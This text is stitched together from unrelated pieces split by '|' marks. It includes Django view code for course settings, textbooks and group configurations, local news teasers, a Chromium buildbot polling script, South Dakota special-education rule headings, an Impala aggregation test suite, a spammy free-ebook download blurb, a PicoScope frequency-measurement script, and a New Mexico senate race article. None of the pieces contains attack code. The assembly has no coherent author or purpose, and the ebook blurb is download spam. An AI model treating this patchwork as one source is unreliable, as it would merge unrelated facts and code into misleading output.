# user has failed to put iterable value into advanced component list.
# return immediately and let validation handle.
return
if tab_enabled:
# check passed, some of this component_types are present, adding tab
if _add_tab(request, tab_type, course_module):
# tab indeed was added, the change needs to propagate
tabs_changed = True
else:
# the tab should not be present (anymore)
if _remove_tab(request, tab_type, course_module):
# tab indeed was removed, the change needs to propagate
tabs_changed = True
return tabs_changed
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT"))
@expect_json
def advanced_settings_handler(request, course_key_string):
"""
Course settings configuration
GET
html: get the page
json: get the model
PUT, POST
json: update the Course's settings. The payload is a json rep of the
metadata dicts.
"""
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
return render_to_response('settings_advanced.html', {
'context_course': course_module,
'advanced_dict': json.dumps(CourseMetadata.fetch(course_module)),
'advanced_settings_url': reverse_course_url('advanced_settings_handler', course_key)
})
elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
if request.method == 'GET':
return JsonResponse(CourseMetadata.fetch(course_module))
else:
try:
# do not process tabs unless they were modified according to course metadata
filter_tabs = not _modify_tabs_to_components(request, course_module)
# validate data formats and update
is_valid, errors, updated_data = CourseMetadata.validate_and_update_from_json(
course_module,
request.json,
filter_tabs=filter_tabs,
user=request.user,
)
if is_valid:
return JsonResponse(updated_data)
else:
return JsonResponseBadRequest(errors)
# Handle all errors that validation doesn't catch
except (TypeError, ValueError) as err:
return HttpResponseBadRequest(
django.utils.html.escape(err.message),
content_type="text/plain"
)
class TextbookValidationError(Exception):
"An error thrown when a textbook input is invalid"
pass
def validate_textbooks_json(text):
"""
Validate the given text as representing a single PDF textbook
"""
try:
textbooks = json.loads(text)
except ValueError:
raise TextbookValidationError("invalid JSON")
if not isinstance(textbooks, (list, tuple)):
raise TextbookValidationError("must be JSON list")
for textbook in textbooks:
validate_textbook_json(textbook)
# check specified IDs for uniqueness
all_ids = [textbook["id"] for textbook in textbooks if "id" in textbook]
unique_ids = set(all_ids)
if len(all_ids) > len(unique_ids):
raise TextbookValidationError("IDs must be unique")
return textbooks
def validate_textbook_json(textbook):
"""
Validate the given text as representing a list of PDF textbooks
"""
if isinstance(textbook, basestring):
try:
textbook = json.loads(textbook)
except ValueError:
raise TextbookValidationError("invalid JSON")
if not isinstance(textbook, dict):
raise TextbookValidationError("must be JSON object")
if not textbook.get("tab_title"):
raise TextbookValidationError("must have tab_title")
tid = unicode(textbook.get("id", ""))
if tid and not tid[0].isdigit():
raise TextbookValidationError("textbook ID must start with a digit")
return textbook
def assign_textbook_id(textbook, used_ids=()):
"""
Return an ID that can be assigned to a textbook
and doesn't match the used_ids
"""
tid = Location.clean(textbook["tab_title"])
if not tid[0].isdigit():
# stick a random digit in front
tid = random.choice(string.digits) + tid
while tid in used_ids:
# add a random ASCII character to the end
tid = tid + random.choice(string.ascii_lowercase)
return tid
@require_http_methods(("GET", "POST", "PUT"))
@login_required
@ensure_csrf_cookie
def textbooks_list_handler(request, course_key_string):
"""
A RESTful handler for textbook collections.
GET
html: return textbook list page (Backbone application)
json: return JSON representation of all textbooks in this course
POST
json: create a new textbook for this course
PUT
json: overwrite all textbooks in the course with the given list
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course = get_course_and_check_access(course_key, request.user)
if "application/json" not in request.META.get('HTTP_ACCEPT', 'text/html'):
# return HTML page
upload_asset_url = reverse_course_url('assets_handler', course_key)
textbook_url = reverse_course_url('textbooks_list_handler', course_key)
return render_to_response('textbooks.html', {
'context_course': course,
'textbooks': course.pdf_textbooks,
'upload_asset_url': upload_asset_url,
'textbook_url': textbook_url,
})
# from here on down, we know the client has requested JSON
if request.method == 'GET':
return JsonResponse(course.pdf_textbooks)
elif request.method == 'PUT':
try:
textbooks = validate_textbooks_json(request.body)
except TextbookValidationError as err:
return JsonResponse({"error": err.message}, status=400)
tids = set(t["id"] for t in textbooks if "id" in t)
for textbook in textbooks:
if "id" not in textbook:
tid = assign_textbook_id(textbook, tids)
textbook["id"] = tid
tids.add(tid)
if not any(tab['type'] == PDFTextbookTabs.type for tab in course.tabs):
course.tabs.append(PDFTextbookTabs())
course.pdf_textbooks = textbooks
store.update_item(course, request.user.id)
return JsonResponse(course.pdf_textbooks)
elif request.method == 'POST':
# create a new textbook for the course
try:
textbook = validate_textbook_json(request.body)
except TextbookValidationError as err:
return JsonResponse({"error": err.message}, status=400)
if not textbook.get("id"):
tids = set(t["id"] for t in course.pdf_textbooks if "id" in t)
textbook["id"] = assign_textbook_id(textbook, tids)
existing = course.pdf_textbooks
existing.append(textbook)
course.pdf_textbooks = existing
if not any(tab['type'] == PDFTextbookTabs.type for tab in course.tabs):
course.tabs.append(PDFTextbookTabs())
store.update_item(course, request.user.id)
resp = JsonResponse(textbook, status=201)
resp["Location"] = reverse_course_url(
'textbooks_detail_handler',
course.id,
kwargs={'textbook_id': textbook["id"]}
)
return resp
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
def textbooks_detail_handler(request, course_key_string, textbook_id):
"""
JSON API endpoint for manipulating a textbook via its internal ID.
Used by the Backbone application.
GET
json: return JSON representation of textbook
POST or PUT
json: update textbook based on provided information
DELETE
json: remove textbook
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
matching_id = [tb for tb in course_module.pdf_textbooks
if unicode(tb.get("id")) == unicode(textbook_id)]
if matching_id:
textbook = matching_id[0]
else:
textbook = None
if request.method == 'GET':
if not textbook:
return JsonResponse(status=404)
return JsonResponse(textbook)
elif request.method in ('POST', 'PUT'): # can be either and sometimes
# django is rewriting one to the other
try:
new_textbook = validate_textbook_json(request.body)
except TextbookValidationError as err:
return JsonResponse({"error": err.message}, status=400)
new_textbook["id"] = textbook_id
if textbook:
i = course_module.pdf_textbooks.index(textbook)
new_textbooks = course_module.pdf_textbooks[0:i]
new_textbooks.append(new_textbook)
new_textbooks.extend(course_module.pdf_textbooks[i + 1:])
course_module.pdf_textbooks = new_textbooks
else:
course_module.pdf_textbooks.append(new_textbook)
store.update_item(course_module, request.user.id)
return JsonResponse(new_textbook, status=201)
elif request.method == 'DELETE':
if not textbook:
return JsonResponse(status=404)
i = course_module.pdf_textbooks.index(textbook)
remaining_textbooks = course_module.pdf_textbooks[0:i]
remaining_textbooks.extend(course_module.pdf_textbooks[i + 1:])
course_module.pdf_textbooks = remaining_textbooks
store.update_item(course_module, request.user.id)
return JsonResponse()
class GroupConfigurationsValidationError(Exception):
"""
An error thrown when a group configurations input is invalid.
"""
pass
class GroupConfiguration(object):
"""
Prepare Group Configuration for the course.
"""
def __init__(self, json_string, course, configuration_id=None):
"""
Receive group configuration as a json (`json_string`), deserialize it
and validate.
"""
self.configuration = GroupConfiguration.parse(json_string)
self.course = course
self.assign_id(configuration_id)
self.assign_group_ids()
self.validate()
@staticmethod
def parse(json_string):
"""
Deserialize given json that represents group configuration.
"""
try:
configuration = json.loads(json_string)
except ValueError:
raise GroupConfigurationsValidationError(_("invalid JSON"))
configuration["version"] = UserPartition.VERSION
return configuration
def validate(self):
"""
Validate group configuration representation.
"""
if not self.configuration.get("name"):
raise GroupConfigurationsValidationError(_("must have name of the configuration"))
if len(self.configuration.get('groups', [])) < 1:
raise GroupConfigurationsValidationError(_("must have at least one group"))
def assign_id(self, configuration_id=None):
"""
Assign id for the json representation of group configuration.
"""
if configuration_id:
self.configuration['id'] = int(configuration_id)
else:
self.configuration['id'] = generate_int_id(
MINIMUM_GROUP_ID, MYSQL_MAX_INT, GroupConfiguration.get_used_ids(self.course)
)
def assign_group_ids(self):
"""
Assign ids for the group_configuration's groups.
"""
used_ids = [g.id for p in self.course.user_partitions for g in p.groups]
# Assign ids to every group in configuration.
for group in self.configuration.get('groups', []):
if group.get('id') is None:
group["id"] = generate_int_id(MINIMUM_GROUP_ID, MYSQL_MAX_INT, used_ids)
used_ids.append(group["id"])
@staticmethod
def get_used_ids(course):
"""
Return a list of IDs that already in use.
"""
return set([p.id for p in course.user_partitions])
def get_user_partition(self):
"""
Get user partition for saving in course.
"""
return UserPartition.from_json(self.configuration)
@staticmethod
def _get_usage_info(course, unit, item, usage_info, group_id, scheme_name=None):
"""
Get usage info for unit/module.
"""
unit_url = reverse_usage_url(
'container_handler',
course.location.course_key.make_usage_key(unit.location.block_type, unit.location.name)
)
usage_dict = {'label': u"{} / {}".format(unit.display_name, item.display_name), 'url': unit_url}
if scheme_name == RANDOM_SCHEME:
validation_summary = item.general_validation_message()
usage_dict.update({'validation': validation_summary.to_json() if validation_summary else None})
usage_info[group_id].append(usage_dict)
return usage_info
@staticmethod
def get_content_experiment_usage_info(store, course):
"""
Get usage information for all Group Configurations currently referenced by a split_test instance.
"""
split_tests = store.get_items(course.id, qualifiers={'category': 'split_test'})
return GroupConfiguration._get_content_experiment_usage_info(store, course, split_tests)
@staticmethod
def get_split_test_partitions_with_usage(store, course):
"""
Returns json split_test group configurations updated with usage information.
"""
usage_info = GroupConfiguration.get_content_experiment_usage_info(store, course)
configurations = []
for partition in get_split_user_partitions(course.user_partitions):
configuration = partition.to_json()
configuration['usage'] = usage_info.get(partition.id, [])
configurations.append(configuration)
return configurations
@staticmethod
def _get_content_experiment_usage_info(store, course, split_tests):
"""
Returns all units names, their urls and validation messages.
Returns:
{'user_partition_id':
[
{
'label': 'Unit 1 / Experiment 1',
'url': 'url_to_unit_1',
'validation': {'message': 'a validation message', 'type': 'warning'}
},
{
'label': 'Unit 2 / Experiment 2',
'url': 'url_to_unit_2',
'validation': {'message': 'another validation message', 'type': 'error'}
}
],
}
"""
usage_info = {}
for split_test in split_tests:
if split_test.user_partition_id not in usage_info:
usage_info[split_test.user_partition_id] = []
unit = split_test.get_parent()
if not unit:
log.warning("Unable to find parent for split_test %s", split_test.location)
continue
usage_info = GroupConfiguration._get_usage_info(
course=course,
unit=unit,
item=split_test,
usage_info=usage_info,
group_id=split_test.user_partition_id,
scheme_name=RANDOM_SCHEME
)
return usage_info
@staticmethod
def get_content_groups_usage_info(store, course):
"""
Get usage information for content groups.
"""
items = store.get_items(course.id, settings={'group_access': {'$exists': True}})
return GroupConfiguration._get_content_groups_usage_info(course, items)
@staticmethod
def _get_content_groups_usage_info(course, items):
"""
Returns all units names and their urls.
Returns:
{'group_id':
[
{
'label': 'Unit 1 / Problem 1',
'url': 'url_to_unit_1'
},
{
'label': 'Unit 2 / Problem 2',
'url': 'url_to_unit_2'
}
],
}
"""
usage_info = {}
for item in items:
if hasattr(item, 'group_access') and item.group_access:
(__, group_ids), = item.group_access.items()
for group_id in group_ids:
if group_id not in usage_info:
usage_info[group_id] = []
unit = item.get_parent()
if not unit:
log.warning("Unable to find parent for component %s", item.location)
continue
usage_info = GroupConfiguration._get_usage_info(
course,
unit=unit,
item=item,
usage_info=usage_info,
group_id=group_id
)
return usage_info
@staticmethod
def update_usage_info(store, course, configuration):
"""
Update usage information for particular Group Configuration.
Returns json of particular group configuration updated with usage information.
"""
configuration_json = None
# Get all Experiments that use particular Group Configuration in course.
if configuration.scheme.name == RANDOM_SCHEME:
split_tests = store.get_items(
course.id,
category='split_test',
content={'user_partition_id': configuration.id}
)
configuration_json = configuration.to_json()
usage_information = GroupConfiguration._get_content_experiment_usage_info(store, course, split_tests)
configuration_json['usage'] = usage_information.get(configuration.id, [])
elif configuration.scheme.name == COHORT_SCHEME:
# In case if scheme is "cohort"
configuration_json = GroupConfiguration.update_content_group_usage_info(store, course, configuration)
return configuration_json
@staticmethod
def update_content_group_usage_info(store, course, configuration):
"""
Update usage information for particular Content Group Configuration.
Returns json of particular content group configuration updated with usage information.
"""
usage_info = GroupConfiguration.get_content_groups_usage_info(store, course)
content_group_configuration = configuration.to_json()
for group in content_group_configuration['groups']:
group['usage'] = usage_info.get(group['id'], [])
return content_group_configuration
@staticmethod
def get_or_create_content_group(store, course):
"""
Returns the first user partition from the course which uses the
CohortPartitionScheme, or generates one if no such partition is
found. The created partition is not saved to the course until
the client explicitly creates a group within the partition and
POSTs back.
"""
content_group_configuration = get_cohorted_user_partition(course.id)
if content_group_configuration is None:
content_group_configuration = UserPartition(
id=generate_int_id(MINIMUM_GROUP_ID, MYSQL_MAX_INT, GroupConfiguration.get_used_ids(course)),
name=CONTENT_GROUP_CONFIGURATION_NAME,
description=CONTENT_GROUP_CONFIGURATION_DESCRIPTION,
groups=[],
scheme_id=COHORT_SCHEME
)
return content_group_configuration.to_json()
content_group_configuration = GroupConfiguration.update_content_group_usage_info(
store,
course,
content_group_configuration
)
return content_group_configuration
def remove_content_or_experiment_group(request, store, course, configuration, group_configuration_id, group_id=None):
"""
Remove content group or experiment group configuration only if it's not in use.
"""
configuration_index = course.user_partitions.index(configuration)
if configuration.scheme.name == RANDOM_SCHEME:
usages = GroupConfiguration.get_content_experiment_usage_info(store, course)
used = int(group_configuration_id) in usages
if used:
return JsonResponse(
{"error": _("This group configuration is in use and cannot be deleted.")},
status=400
)
course.user_partitions.pop(configuration_index)
elif configuration.scheme.name == COHORT_SCHEME:
if not group_id:
return JsonResponse(status=404)
group_id = int(group_id)
usages = GroupConfiguration.get_content_groups_usage_info(store, course)
used = group_id in usages
if used:
return JsonResponse(
{"error": _("This content group is in use and cannot be deleted.")},
status=400
)
matching_groups = [group for group in configuration.groups if group.id == group_id]
if matching_groups:
group_index = configuration.groups.index(matching_groups[0])
configuration.groups.pop(group_index)
else:
return JsonResponse(status=404)
course.user_partitions[configuration_index] = configuration
store.update_item(course, request.user.id)
return JsonResponse(status=204)
@require_http_methods(("GET", "POST"))
@login_required
@ensure_csrf_cookie
def group_configurations_list_handler(request, course_key_string):
"""
A RESTful handler for Group Configurations
GET
html: return Group Configurations list page (Backbone application)
POST
json: create new group configuration
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', 'text/html'):
group_configuration_url = reverse_course_url('group_configurations_list_handler', course_key)
course_outline_url = reverse_course_url('course_handler', course_key)
should_show_experiment_groups = are_content_experiments_enabled(course)
if should_show_experiment_groups:
experiment_group_configurations = GroupConfiguration.get_split_test_partitions_with_usage(store, course)
else:
experiment_group_configurations = None
content_group_configuration = GroupConfiguration.get_or_create_content_group(store, course)
return render_to_response('group_configurations.html', {
'context_course': course,
'group_configuration_url': group_configuration_url,
'course_outline_url': course_outline_url,
'experiment_group_configurations': experiment_group_configurations,
'should_show_experiment_groups': should_show_experiment_groups,
'content_group_configuration': content_group_configuration
})
elif "application/json" in request.META.get('HTTP_ACCEPT'):
if request.method == 'POST':
# create a new group configuration for the course
try:
new_configuration = GroupConfiguration(request.body, course).get_user_partition()
except GroupConfigurationsValidationError as err:
return JsonResponse({"error": err.message}, status=400)
course.user_partitions.append(new_configuration)
response = JsonResponse(new_configuration.to_json(), status=201)
response["Location"] = reverse_course_url(
'group_configurations_detail_handler',
course.id,
kwargs={'group_configuration_id': new_configuration.id} # pylint: disable=no-member
)
store.update_item(course, request.user.id)
return response
else:
return HttpResponse(status=406)
@login_required
@ensure_csrf_cookie
@require_http_methods(("POST", "PUT", "DELETE"))
def group_configurations_detail_handler(request, course_key_string, group_configuration_id, group_id=None):
"""
JSON API endpoint for manipulating a group configuration via its internal ID.
Used by the Backbone application.
POST or PUT
json: update group configuration based on provided information
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course = get_course_and_check_access(course_key, request.user)
matching_id = [p for p in course.user_partitions
if unicode(p.id) == unicode(group_configuration_id)]
if matching_id:
configuration = matching_id[0]
else:
configuration = None
if request.method in ('POST', 'PUT'): # can be either and sometimes
# django is rewriting one to the other
try:
new_configuration = GroupConfiguration(request.body, course, group_configuration_id).get_user_partition()
except GroupConfigurationsValidationError as err:
return JsonResponse({"error": err.message}, status=400)
if configuration:
index = course.user_partitions.index(configuration)
course.user_partitions[index] = new_configuration
else:
course.user_partitions.append(new_configuration)
store.update_item(course, request.user.id)
configuration = GroupConfiguration.update_usage_info(store, course, new_configuration)
return JsonResponse(configuration, status=201)
elif request.method == "DELETE":
if not configuration:
return JsonResponse(status=404)
return remove_content_or_experiment_group(
request=request,
store=store,
course=course,
configuration=configuration,
group_configuration_id=group_configuration_id,
group_id=group_id
)
def are_content_experiments_enabled(course):
"""
Returns True if content experiments have been enabled for the course.
"""
return (
SPLIT_TEST_COMPONENT_TYPE in ADVANCED_COMPONENT_TYPES and
SPLIT_TEST_COMPONENT_TYPE in course.advanced_modules
)
def _get_course_creator_status(user):
"""
Helper method for returning the course creator status for a particular user,
taking into account the values of DISABLE_COURSE_CREATION and ENABLE_CREATOR_GROUP.
If the user passed in has not previously visited the index page, it will be
added with status 'unrequested' if the course creator group is in use.
"""
if user.is_staff:
course_creator_status = 'granted'
elif settings.FEATURES.get('DISABLE_COURSE_CREATION', False):
course_creator_status = 'disallowed_for_this_site'
elif settings.FEATURES.get('ENABLE_CREATOR_GROUP', False):
course_creator_status = get_course_creator_status(user)
if course_creator_status is None:
# User not grandfathered in as an existing user, has not previously visited the dashboard page.
# Add the user to the course creator admin table with status 'unrequested'.
add_user_with_status_unrequested(user)
course_creator_status = get_course_creator_status(user)
else:
course_creator_status = 'granted'
return course_creator_status
|
NAACP National Convention & Diversity Career FairThe NAACP National Convention & Diversity Career Fair is July 25 at the Baltimore Convention Center.
Fallen Officer: How To Help The Family Of Ashley GuindonThe Prince William County Police Association has created an account for anyone that wishes to donate money to the family in memory of Officer Ashley Guindon.
ScamTrackerTo learn about scams in your area, check out the Better Business Bureau's Scam Tracker.
Girl Who Lost Family In Fire Has One Christmas WishSafyre Terry, 8, is the sole survivor of the blaze that killed her family two years ago.
Family Raises Funds For 4-Year-Old Killed In DundalkA four-year-old was killed in an accident Sunday afternoon.
|
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import multiprocessing
import sys
import time
import traceback
import buildbot
POLL_INTERVAL = 600
BUILD_HISTORY_COUNT = 200
BUILD_RESULTS_COUNT = 50
def FetchLatestBuildResults(builder):
try:
builder.FetchRecentBuilds(BUILD_HISTORY_COUNT)
print 'Fetching results for', builder
for build in builder.LastBuilds(BUILD_RESULTS_COUNT):
for step in build.steps.itervalues():
step.results # pylint: disable=pointless-statement
except: # multiprocessing doesn't give useful stack traces, so print it here.
traceback.print_exc(file=sys.stderr)
print
raise
def main():
logging.getLogger().setLevel(logging.INFO)
builders = buildbot.Builders('chromium.perf')
process_pool = multiprocessing.Pool(4)
while True:
print 'Refreshing...'
buildbot.Update('chromium.perf', builders)
process_pool.map(FetchLatestBuildResults, builders.itervalues())
print 'Refreshed!'
time.sleep(POLL_INTERVAL)
if __name__ == '__main__':
main()
|
24:05:30:01 General responsibility of school district.
24:05:30:02 Opportunity to examine records.
24:05:30:02.01 Parent participation in meetings.
24:05:30:06.01 Procedural safeguards notice -- Availability.
24:05:30:06.02 Procedural safeguards notice -- Contents.
24:05:30:07.01 Filing a due process complaint.
24:05:30:07.02 Timeline for filing a due process complaint.
24:05:30:08 Free or low-cost services to parent.
24:05:30:08.01 Due process complaint notice.
24:05:30:08.02 Content of due process complaint notice.
24:05:30:08.04 Decision on sufficiency of complaint.
24:05:30:08.05 Amendment to due process complaint.
24:05:30:08.06 District response to due process complaint.
24:05:30:08.07 Other party response to due process complaint.
24:05:30:08.09 Resolution meeting -- Participants.
24:05:30:08.10 Resolution meeting -- Purpose.
24:05:30:08.11 Resolution meeting -- Waive or mediate.
24:05:30:08.12 Resolution period -- General.
24:05:30:08.13 Dismissal of complaint or initiation of hearing.
24:05:30:08.14 Adjustments to 30-day resolution period.
24:05:30:09.01 Mediator -- Qualified and impartial.
24:05:30:09.02 Meeting to encourage mediation.
24:05:30:09.04 Impartial due process hearing.
24:05:30:09.05 Subject matter of due process hearings.
24:05:30:09.06 Timeline for requesting a due process hearing.
24:05:30:10.01 Decision of hearing officer.
24:05:30:11 Appeal of hearing decision -- Civil action.
24:05:30:12.01 Additional disclosure of information.
24:05:30:13 Time limit for and convenience of hearings.
24:05:30:14 Child's status during proceedings.
24:05:30:16.01 Transfer of parental rights.
|
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
# Validates all aggregate functions across all datatypes
#
import logging
import pytest
from tests.common.test_vector import *
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.test_dimensions import create_exec_option_dimension
from tests.common.test_dimensions import create_uncompressed_text_dimension
from tests.common.skip import SkipIfOldAggsJoins, SkipIfS3
from tests.util.test_file_parser import QueryTestSectionReader
agg_functions = ['sum', 'count', 'min', 'max', 'avg']
data_types = ['int', 'bool', 'double', 'bigint', 'tinyint',
'smallint', 'float', 'timestamp']
result_lut = {
# TODO: Add verification for other types
'sum-tinyint': 45000, 'avg-tinyint': 5, 'count-tinyint': 9000,
'min-tinyint': 1, 'max-tinyint': 9,
'sum-smallint': 495000, 'avg-smallint': 50, 'count-smallint': 9900,
'min-smallint': 1, 'max-smallint': 99,
'sum-int': 4995000, 'avg-int': 500, 'count-int': 9990,
'min-int': 1, 'max-int': 999,
'sum-bigint': 49950000, 'avg-bigint': 5000, 'count-bigint': 9990,
'min-bigint': 10, 'max-bigint': 9990,
}
class TestAggregation(ImpalaTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAggregation, cls).add_test_dimensions()
# Add two more dimensions
cls.TestMatrix.add_dimension(TestDimension('agg_func', *agg_functions))
cls.TestMatrix.add_dimension(TestDimension('data_type', *data_types))
cls.TestMatrix.add_constraint(lambda v: cls.is_valid_vector(v))
@classmethod
def is_valid_vector(cls, vector):
data_type, agg_func = vector.get_value('data_type'), vector.get_value('agg_func')
file_format = vector.get_value('table_format').file_format
if file_format not in ['parquet']: return False
if cls.exploration_strategy() == 'core':
# Reduce execution time when exploration strategy is 'core'
if vector.get_value('exec_option')['batch_size'] != 0: return False
# Avro doesn't have timestamp type
if file_format == 'avro' and data_type == 'timestamp':
return False
elif agg_func not in ['min', 'max', 'count'] and data_type == 'bool':
return False
elif agg_func == 'sum' and data_type == 'timestamp':
return False
return True
def test_aggregation(self, vector):
data_type, agg_func = (vector.get_value('data_type'), vector.get_value('agg_func'))
query = 'select %s(%s_col) from alltypesagg where day is not null' % (agg_func,
data_type)
result = self.execute_scalar(query, vector.get_value('exec_option'),
table_format=vector.get_value('table_format'))
if 'int' in data_type:
assert result_lut['%s-%s' % (agg_func, data_type)] == int(result)
# AVG
if vector.get_value('data_type') == 'timestamp' and\
vector.get_value('agg_func') == 'avg':
return
query = 'select %s(DISTINCT(%s_col)) from alltypesagg where day is not null' % (
agg_func, data_type)
result = self.execute_scalar(query, vector.get_value('exec_option'))
class TestAggregationQueries(ImpalaTestSuite):
"""Run the aggregation test suite, with codegen enabled and disabled, to exercise our
non-codegen code"""
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAggregationQueries, cls).add_test_dimensions()
cls.TestMatrix.add_dimension(
create_exec_option_dimension(disable_codegen_options=[False, True]))
if cls.exploration_strategy() == 'core':
cls.TestMatrix.add_dimension(create_uncompressed_text_dimension(cls.get_workload()))
@SkipIfS3.insert
@pytest.mark.execute_serially
def test_non_codegen_tinyint_grouping(self, vector):
# Regression for IMPALA-901. The test includes an INSERT statement, so can only be run
# on INSERT-able formats - text only in this case, since the bug doesn't depend on the
# file format.
if vector.get_value('table_format').file_format == 'text' \
and vector.get_value('table_format').compression_codec == 'none':
self.run_test_case('QueryTest/aggregation_no_codegen_only', vector)
def test_aggregation(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail(reason="IMPALA-283 - select count(*) produces inconsistent results")
self.run_test_case('QueryTest/aggregation', vector)
def test_distinct(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail("HBase returns columns in alphabetical order for select distinct *, "
"making the result verication to fail.")
self.run_test_case('QueryTest/distinct', vector)
def test_group_concat(self, vector):
"""group_concat distinct tests
Required to run directly in python because the order in which results will be
merged at the final, single-node aggregation step is non-deterministic (if the
first phase is running on multiple nodes). Need to pull the result apart and
compare the actual items)"""
exec_option = vector.get_value('exec_option')
table_format = vector.get_value('table_format')
# Test group_concat distinct with other aggregate function and groupings.
# expected result is the row: 2010,'1, 2, 3, 4','1-2-3-4','2|3|1|4',40,4
query = """select year, group_concat(distinct string_col),
group_concat(distinct string_col, '-'), group_concat(distinct string_col, '|'),
count(string_col), count(distinct string_col)
from alltypesagg where int_col < 5 and year = 2010 group by year"""
result = self.execute_query(query, exec_option, table_format=table_format)
row = (result.data)[0].split("\t")
assert(len(row) == 6)
assert(row[0] == '2010')
delimiter = [', ', '-', '|']
for i in range(1, 4):
assert(set(row[i].split(delimiter[i-1])) == set(['1', '2', '3', '4']))
assert(row[4] == '40')
assert(row[5] == '4')
# Test group_concat distinct with arrow delimiter, with multiple rows
query = """select day, group_concat(distinct string_col, "->")
from (select * from alltypesagg where id % 100 = day order by id limit 99999) a
group by day order by day"""
result = self.execute_query(query, exec_option, table_format=table_format)
string_col = []
string_col.append(set(['1','101','201','301','401','501','601','701','801','901']))
string_col.append(set(['2','102','202','302','402','502','602','702','802','902']))
string_col.append(set(['3','103','203','303','403','503','603','703','803','903']))
string_col.append(set(['4','104','204','304','404','504','604','704','804','904']))
string_col.append(set(['5','105','205','305','405','505','605','705','805','905']))
string_col.append(set(['6','106','206','306','406','506','606','706','806','906']))
string_col.append(set(['7','107','207','307','407','507','607','707','807','907']))
string_col.append(set(['8','108','208','308','408','508','608','708','808','908']))
string_col.append(set(['9','109','209','309','409','509','609','709','809','909']))
string_col.append(set(['10','110','210','310','410','510','610','710','810','910']))
assert(len(result.data) == 10)
for i in range(10):
row = (result.data)[i].split("\t")
assert(len(row) == 2)
assert(row[0] == str(i+1))
assert(set(row[1].split("->")) == string_col[i])
# Test group_concat distinct with merge node
query = """select group_concat(distinct string_col, ' ') from alltypesagg
where int_col < 10"""
result = self.execute_query(query, exec_option, table_format=table_format)
assert(set((result.data)[0].split(" ")) == set(['1','2','3','4','5','6','7','8','9']))
class TestTPCHAggregationQueries(ImpalaTestSuite):
# Uses the TPC-H dataset in order to have larger aggregations.
@classmethod
def get_workload(cls):
return 'tpch'
@classmethod
def add_test_dimensions(cls):
super(TestTPCHAggregationQueries, cls).add_test_dimensions()
cls.TestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format in ['parquet'])
def test_tpch_aggregations(self, vector):
self.run_test_case('tpch-aggregations', vector)
@SkipIfOldAggsJoins.passthrough_preagg
def test_tpch_passthrough_aggregations(self, vector):
self.run_test_case('tpch-passthrough-aggregations', vector)
|
eBook Primary Care 4th Edition available at elcentrohistorico.com with Format PdF, ePub, Audiobook & Magazine. Please Create a FREE ACCOUNT to read or download Primary Care 4th Edition FOR FREE.
Finally I can download and read Primary Care 4th Edition Thank you!
|
# -*- coding: utf-8
# Example by Colin O'Flynn
#
import math
import time
import inspect
import numpy as np
from picoscope import ps5000a
from matplotlib.mlab import find
class freqMeasure():
def __init__(self):
self.ps = ps5000a.PS5000a(connect=False)
def openScope(self):
self.ps.open()
self.ps.setChannel("A", coupling="DC", VRange=5.0, probeAttenuation=10)
self.ps.setChannel("B", enabled=False)
self.ps.setChannel("C", enabled=False)
self.ps.setChannel("D", enabled=False)
res = self.ps.setSamplingFrequency(1000E6, 50000)
self.sampleRate = res[0]
print "Sampling @ %f MHz, %d samples"%(res[0]/1E6, res[1])
#Use external trigger to mark when we sample
self.ps.setSimpleTrigger(trigSrc="External", threshold_V=0.150, timeout_ms=5000)
def closeScope(self):
self.ps.close()
def armMeasure(self):
self.ps.runBlock()
def freq_from_crossings(self, sig):
"""Estimate frequency by counting zero crossings"""
# From https://gist.github.com/endolith/255291:
fs = self.sampleRate
# Find all indices right before a rising-edge zero crossing
indices = find((sig[1:] >= 0) & (sig[:-1] < 0))
# More accurate, using linear interpolation to find intersample
# zero-crossings (Measures 1000.000129 Hz for 1000 Hz, for instance)
crossings = [i - sig[i] / (sig[i+1] - sig[i]) for i in indices]
# Some other interpolation based on neighboring points might be better. Spline, cubic, whatever
return fs / np.mean(np.diff(crossings))
def measure(self):
print "Waiting for trigger"
while(self.ps.isReady() == False): time.sleep(0.01)
print "Sampling Done"
data = self.ps.getDataV("A", 50000)
data = data - np.mean(data)
freq = self.freq_from_crossings(data)
print freq
if __name__ == "__main__":
fm = freqMeasure()
fm.openScope()
try:
while 1:
fm.armMeasure()
fm.measure()
except KeyboardInterrupt:
pass
fm.closeScope()
|
Democrats control the 42-member New Mexico Senate and Republicans control of the 70-member New Mexico House of Representatives, which until 2014 had been under Democratic control for 50 years. There is hope in both parties that each might gain control of the other chamber on Nov. 8 with wins in a few key races.
Running for the senate seat of District 15 in Albuquerque’s mid-Northeast Heights are incumbent Daniel Ivey-Soto and challenger Eric Burton.
Democrat Ivey-Soto is a lawyer who has represented the district since 2013. He’s a former elections director in the office of secretary of state. He sponsored a transparency law requiring 72-hour notice of public meetings. He’s working on a bill to establish a Public Accountability Board, which would have enforcement and decision-making capability over state and local officials.
Republican Eric Burton is a lawyer who co-owns a trust company and several other small businesses. He worked as chief of staff for the Republican-controlled House Judiciary Committee. “I would put myself in the category of a free-market capitalist conservative who leans libertarian on social issues,” he told the Albuquerque Journal.
